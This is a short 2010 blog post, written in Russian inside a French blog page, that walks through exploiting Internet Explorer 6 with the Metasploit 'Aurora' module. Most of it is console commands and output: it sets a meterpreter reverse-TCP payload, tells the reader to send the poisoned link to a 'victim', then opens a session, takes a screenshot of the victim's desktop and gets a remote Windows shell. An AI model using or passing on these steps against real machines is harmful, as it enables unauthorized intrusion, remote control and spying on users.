mercredi 17 février 2010

"Aurora" IE Exploit

Эксплоит довольно свежий и шансы на успех есть.
Модуль функционирует в данный момент только с IE6.
Для начала создадим ядовитую ссылку. Запускаем консоль и вводим :
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >
Отправляем нашу полученную ссылку (http://192.168.0.151:8080/) жертве. Не закрывайте консоль. Если эксплоит прокатил мы должны увидеть в консоли MSF:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
IP жертвы 192.168.0.166.
Начинаем сессию:
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer
Поздравляем, мы внутри!
Просто для прикола возьмем скриншот рабочего стола машины жертвы:
meterpreter > use espia
Loading extension espia...success.

meterpreter > screenshot aurora.bmp


meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>
extrait de metasloit.com

Aucun commentaire:

Enregistrer un commentaire